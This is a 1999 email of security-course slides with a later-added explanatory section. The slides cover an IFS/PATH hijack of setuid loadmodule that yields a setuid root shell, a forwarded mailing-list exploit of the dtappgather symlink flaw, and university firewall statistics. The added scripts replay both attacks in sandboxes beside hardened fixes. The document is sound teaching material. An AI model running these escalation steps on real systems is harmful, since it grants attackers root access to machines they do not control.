From ellenm@net.tamu.edu Mon Mar 22 11:30:51 1999
Received: from net.tamu.edu (net.tamu.edu [128.194.177.1])
	by cs.tamu.edu (8.9.1/8.9.1) with ESMTP id LAA24464
	for ; Mon, 22 Mar 1999 11:30:50 -0600 (CST)
Received: from localhost (ellenm@localhost)
	by net.tamu.edu (8.8.8/8.8.8) with SMTP id LAA14040
	for ; Mon, 22 Mar 1999 11:31:33 -0600 (CST)
Message-Id: <199903221731.LAA14040@net.tamu.edu>
To: pooch@cs.tamu.edu
Subject: class notes
Date: Mon, 22 Mar 1999 11:31:32 -0600
From: Ellen L Mitchell
Status: RO
Content-Length: 5420

Dr. Pooch,

Here are text copies of the slides from the class I lectured:

* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *

Ellen Mitchell
March 11, 1999
for Dr. Pooch

IFS
Input Field Separator

Some programs don't protect from IFS.
- Find something setuid that may have this vulnerability:

~/[44]: ls -l /usr/openwin/bin/loadmodule
-rwsr-xr-x  1 root        24576 Jan 15  1994 loadmodule

- Does it hand a command line to a shell?

/usr/openwin/bin [45]: strings - loadmodule | egrep '(popen|system)'
_system

- Search for directory paths:

/usr/openwin/bin [46]: strings - loadmodule | grep \/
/usr/lib/ld.so
/dev/zero
crt0: no /usr/lib/ld.so
&crt0: /usr/lib/ld.so mapping failure
crt0: no /dev/zero
/usr/lang/SC1.0/cg87:/usr/lang/SC1.0:/usr/lang/SC1.0/ansi_lib
@(#)_crt1.S 1.6 91/02/11 SMI
/etc/openwin/modules
/usr/sys
/bin/sun4
/bin/sun4c
/bin/sun4m
%s/%s/%s/%s
%s/%s
/usr/etc/modload
/var/tmp/loadmodule.out
@(#)_crt2.c 1.4 91/02/11 SMI

Create a file in your directory (world executable) called `bin':

~/tmp[46]: cat >> bin
#!/bin/sh
IFS=" "                  # restore a sane IFS so the payload's own commands parse normally
cp /bin/sh /var/foo      # copy of the shell ...
chmod 4755 /var/foo      # ... made setuid root (loadmodule runs as root)
^D

One way to use `loadmodule' is found in `xnews':

strings - xnews | grep loadm
./loadmodule winlock-`/bin/arch -k`.o winlockload >/dev/null
./loadmodule winlock-sun4.o winlockload

Change your IFS (csh syntax):
setenv IFS /

Put `.' first in your path:
setenv PATH .:$PATH

Now that you have set your IFS, if you run any program which invokes
`loadmodule', you can make it run your `bin' script: `system()' starts
/bin/sh, which inherits IFS from the environment and splits the command
string on `/' instead of on whitespace, so the leading path component of
whatever loadmodule hands to system() becomes the command word (on this
slide, `bin'), and that word is looked up along PATH, where `.' comes first.
Your script copies /bin/sh into /var/foo and makes it setuid root.

./loadmodule winlock-sun4.o winlockload

~[50]: ls -l /var/foo
-rwsr-xr-x  1 root       106496 Jan 15  1994 foo

Run /var/foo:

/var/foo
# id
euid(0)

* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *

Symbolic link problems

Buggy program: /usr/dt/bin/dtappgather

Description of the problem:

Local users can change the ownership of any file, thus gaining root
privileges. This happens because "dtappgather" does not check if the file
/var/dt/appconfig/appmanager/generic-display-0 is a symbolic link and
happily chown()s it to the user.

When CERT released advisory CA-98.02 about /usr/dt/bin/dtappgather, I played
a little with dtappgather and discovered the problem above, but I thought
that patch 104498-02 corrects it, as described in SUN's section of 98.02.
When I applied the patch, I realised that it was still possible to gain root
privs.

Systems Affected:

*At least* SunOS 5.5 & 5.5.1 running CDE version 1.0.2 with suid bit on
/usr/dt/bin/dtappgather. SunOS 5.6 (or CDE 1.2) comes with directory
/var/dt/appconfig/appmanager/ mode 755 so it's not possible to make the
necessary link. On the other hand, in SunOS 5.5* this dir has mode 777, so
you can easily make the link or even unlink/rename the file
"generic-display-0" if it exists owned by another user.

Quick Fix:

chmod -s /usr/dt/bin/dtappgather

The Exploit:

The forwarded exploit was initially posted to hack.gr's security mailing
list: "haxor".

Hack wisely,
Mastoras

/*
 * Computer Engineering & Informatics Department, Patras, Greece
 * Mastor Wins, Fatality!  http://www.hack.gr/users/mastoras
 */

---------- Forwarded message ----------
Date: Sat, 24 Jan 1998 02:48:13 +0200 (EET)
From: Mastoras
Reply-To: haxor@hack.gr
To: haxor@papari.hack.gr, Undisclosed recipients: ;
Subject: [HAXOR:11] dtappgather exploit

Hello,

I suppose you have learnt about CERT's advisory on the dtappgather program.
Well, here's the exploit:

user@host% ls -l /etc/passwd
-r--r--r--   1 root     other       1585 Dec 17 22:26 /etc/passwd
user@host% ln -s /etc/passwd /var/dt/appconfig/appmanager/generic-display-0
user@host% dtappgather
MakeDirectory: /var/dt/appconfig/appmanager/generic-display-0: File exists
user@host% ls -l /etc/passwd
-r-xr-xr-x   1 user     buser       1585 Dec 17 22:26 /etc/passwd
user@host% echo "user wins! Fatality!" | mail root

It would be easy to find the exploit if you had read CERT's advisory.
The following steps were enough..

% cp /usr/dt/bin/dtappgather .        [you can't "truss" suid proggies]
% truss -o koko ./dtappgather
% more koko
[ bad ld things ]
chown("/var/dt/appconfig/appmanager/generic-display-0", 666, 666) = 0
chmod("/var/dt/appconfig/appmanager/generic-display-0", 0555)     = 0
[ shitty things ]

I hope this was not too lame or well-known :-)

Seeya,
mastoras

* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *

Firewall statistics: 1992 vs. 1999

Network bandwidth: T1 (1.5 Mb/sec) vs. T3 (45 Mb/sec)
  Today, between us, UT and GSC, we have 4 T3s (45 Mb/sec each)
  Today we sustain 30 Mb/second of traffic
Networked hosts: 12,000 (5,000 TCP/IP) vs. 35,000 (at least 80% TCP/IP) today
Number of hosts in firewall config file: approximately 30 hosts vs.
  approximately 1000 hosts today
Networked buildings: 60 vs. approximately 140 today
Transferred: approximately 4 GB/day vs. 84 GB/day in, 42 GB/day out today
DNS: can handle 600 queries/second (155 dns, 50 dns2, 20 dns3 per second)
Modems: 1632 today
Firewall platform: DOS on a Pentium 133 with NDIS drivers (started dropping
  packets around 20 Mb/sec) vs. FreeBSD with FDDI drivers today

* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
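The IFS trick from the loadmodule slide, replayed against a throwaway script, as an added example; this is not code from the slides, from Sun, or from CERT. Modern Bourne-compatible shells no longer split the literal words of a command string on IFS, so the exact system("/usr/etc/modload ...") case cannot be reproduced on a current system; the same hole survives wherever a script, or a program that starts one, expands a command path from a variable without quoting it. Every name below (the work directory, the "app" tree, the "evil" directory, the "tool" helper) is an assumption made up for the demo, and the impostor merely prints a marker where the slide's `bin' script copied /bin/sh to /var/foo and made it setuid.

```shell
#!/bin/sh
# Added demo, not from the 1999 slides: an attacker-controlled IFS plus a
# PATH entry they own turns an unquoted "$TOOL" into a command named after
# the first path component ("bin"), exactly the word the slide's script is
# named. All paths are invented for the demo.
set -u

WORK=$(mktemp -d)
trap 'rm -rf "$WORK"' EXIT

# The helper the victim script means to run: $WORK/app/bin/tool
mkdir -p "$WORK/app/bin" "$WORK/evil"
printf '#!/bin/sh\necho LEGIT\n' > "$WORK/app/bin/tool"

# The impostor: a file named after the first path component, playing the
# role of the slide's "bin" script (there: cp /bin/sh /var/foo; chmod 4755).
printf '#!/bin/sh\necho HIJACKED\n' > "$WORK/evil/bin"

# Vulnerable: inherits IFS and PATH from whoever runs it and expands $TOOL
# unquoted. With IFS=/ the value "bin/tool" becomes the words "bin" "tool".
cat > "$WORK/app/victim_vuln.sh" <<'EOF'
#!/bin/sh
cd "$(dirname "$0")" || exit 1
TOOL=bin/tool
$TOOL
EOF

# Hardened: back to the default IFS (space, tab, newline), a pinned PATH,
# and a quoted expansion so no field splitting happens at all.
cat > "$WORK/app/victim_fixed.sh" <<'EOF'
#!/bin/sh
unset IFS
PATH=/usr/bin:/bin; export PATH
cd "$(dirname "$0")" || exit 1
TOOL=bin/tool
"$TOOL"
EOF
chmod 755 "$WORK/app/bin/tool" "$WORK/evil/bin" "$WORK"/app/victim_*.sh

# The slide's two moves, "setenv IFS /" and "setenv PATH .:$PATH", with the
# attacker's own directory standing in for ".". Only the child shell sees
# the modified IFS and PATH; this script's own parsing is unaffected.
run_as_attacker() {
    IFS=/ PATH="$WORK/evil:$PATH" /bin/sh "$WORK/app/$1"
}

run_normally() {
    /bin/sh "$WORK/app/$1"
}

echo "normal:     $(run_normally victim_vuln.sh)"      # LEGIT
echo "vulnerable: $(run_as_attacker victim_vuln.sh)"   # HIJACKED
echo "hardened:   $(run_as_attacker victim_fixed.sh)"  # LEGIT
```

The fixed script does three independent things and each one alone would defeat this particular attack: resetting IFS, pinning PATH, and quoting the expansion. A setuid program that calls system() or popen() has to do the equivalent before the shell starts, because it is the shell, not the program, that honours IFS; the slide's `strings | egrep '(popen|system)'` check is how you find the programs that need looking at.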
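The chown()/chmod() pair from the truss trace, replayed in a throwaway directory as an added example that is not part of the forwarded post, the CERT advisory, or Sun's patch. No root is needed: chmod() follows a symbolic link, so changing the link target's mode to 0555 is visible to an ordinary user, which is enough to show why the check matters. The directory and file names and the helper-function names are assumptions made up for the demo, with "generic-display-0" kept from the advisory.

```shell
#!/bin/sh
# Added demo, not from the advisory or the forwarded post: a privileged
# "fix up the spool file" step done by path, through a symlink planted in a
# world-writable directory, beside a version that refuses links and
# world-writable parents. All paths here are invented for the demo.
set -u

WORK=$(mktemp -d)
trap 'rm -rf "$WORK"' EXIT

# Stand-in for a file the unprivileged user must not be able to alter
# (the post used /etc/passwd). Mode 0644: no execute bits.
TARGET=$WORK/protected
printf 'secret\n' > "$TARGET"
chmod 0644 "$TARGET"

# Stand-in for /var/dt/appconfig/appmanager on SunOS 5.5: mode 777, so any
# user can plant a link under the name the privileged program expects.
SPOOL=$WORK/spool
mkdir "$SPOOL"
chmod 0777 "$SPOOL"
ln -s "$TARGET" "$SPOOL/generic-display-0"

# Stand-in for the 5.6 layout: same file name, parent directory mode 755,
# and a real file rather than a link.
SAFE=$WORK/safe
mkdir "$SAFE"
chmod 0755 "$SAFE"
printf 'display config\n' > "$SAFE/generic-display-0"
chmod 0644 "$SAFE/generic-display-0"

# What the truss output shows dtappgather doing: chown() then chmod(0555)
# on the path. Both calls follow symbolic links, so they land on $TARGET.
fixup_vulnerable() {
    chown "$(id -u)" "$1" && chmod 0555 "$1"
}

# Refuse anything that is not a plain file, and refuse to operate inside a
# directory other users can write to. This is still check-then-act: the
# link could be swapped between the test and the chmod, so it narrows the
# window rather than closing it. The durable fixes are the ones the post
# points at (a parent directory that is not world-writable, as in 5.6) or,
# in C, opening with O_NOFOLLOW and using fstat()/fchown()/fchmod() on the
# descriptor so the path is never resolved twice.
fixup_hardened() {
    if [ -L "$1" ] || [ ! -f "$1" ]; then
        echo "refusing: $1 is not a regular file" >&2
        return 1
    fi
    dir=$(dirname "$1")
    if [ -n "$(find "$dir" -prune -perm -002)" ]; then
        echo "refusing: $dir is world-writable" >&2
        return 1
    fi
    chown "$(id -u)" "$1" && chmod 0555 "$1"
}

# Helper for checking the outcome: 0644 has no execute bit, 0555 does.
target_is_executable() {
    [ -x "$TARGET" ]
}

# Helper for checking that the hardened version rejects the planted link.
hardened_refuses_link() {
    if fixup_hardened "$SPOOL/generic-display-0" 2>/dev/null; then
        return 1
    fi
    return 0
}

echo "before:     $(ls -l "$TARGET")"
fixup_vulnerable "$SPOOL/generic-display-0"
echo "vulnerable: $(ls -l "$TARGET")"           # now mode 0555 via the link
chmod 0644 "$TARGET"
fixup_hardened "$SPOOL/generic-display-0" \
    || echo "hardened:   refused, target untouched"
```

Run it and the "vulnerable" line shows the protected file's mode changed to r-xr-xr-x even though the program only ever named the spool path, which is the same thing the post's second `ls -l /etc/passwd` shows. The `chmod -s` quick fix in the post removes the privilege; the check above removes the path confusion; only the directory mode change or descriptor-based operations remove the race.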